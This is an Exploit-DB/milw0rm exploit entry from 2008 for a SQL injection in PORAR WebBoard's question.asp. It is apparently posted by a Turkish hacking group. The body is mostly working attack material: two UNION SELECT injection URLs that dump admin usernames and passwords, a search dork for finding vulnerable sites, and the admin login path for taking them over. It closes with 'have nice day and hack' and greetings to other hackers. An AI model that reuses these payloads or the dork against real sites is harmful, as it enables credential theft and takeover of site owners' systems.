PORAR WebBoard - 'question.asp' SQL Injection

EDB-ID:

5185


Author:

xcorpitx

Type:

webapps


Platform:

ASP

Date:

2008-02-25


  ##     ##     
   ##   ##      
    ## ##
     ###CoRPITX 
     ###     
    ## ##
   ##   ##
  ##     ##

########################### Turkey ####################################
#                                                                     #
#################### www.Hayalet-hack.com #############################
#
##################### www.zone-turk.net/###############################
#             
#            PORAR WEBBOARD SQL Injection Vulnerability 
#
#######################################################################
#  
#  AUTHOR : xcorpitx
#
#  HOME   : www.Hayalet-hack.com / www.zone-turk.net
#
#  email  : xcorpitx@hotmail.com
#
########################################################################
#  This (SQL) give  Admin name and Admin password 
#  Bu sorgu direk admin ismi ve  sisresini verecektir
########################################################################
#
#  DorK   : '' webboard question.asp QID''
#
########################################################################
#            
#  EXPLOIT: 
#
########################################################################
# example 1  : columns number 10
#
question.asp?QID=-1122334455%20+%20union%20+%20select%20+%200,null,2,username,password,5,password,7,8,9,null%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# some týmes thýs sql
# example 2 : columns number 11
#
question.asp?QID=-1%20+%20union%20+%20select%20+%200,1,2,username,4,5,password,7,8,9,10,11%20+%20from%20+%20+%20administrator%20';';
#########################################################################
# admin login
#
http://www.xxx.com/webboard/admin/login.asp
#
########################################################################

Thanx : str0ke,D3ng3s!z,Pc faresi,Hayalet,Turque,SmoKin,Apex,Mostbiq

have nice day and hack 

i m sory jane  :( 


Kankilerim   D3ng3s!z ve Pc faresi ne sevgiler  el sallayin :S

# milw0rm.com [2008-02-25]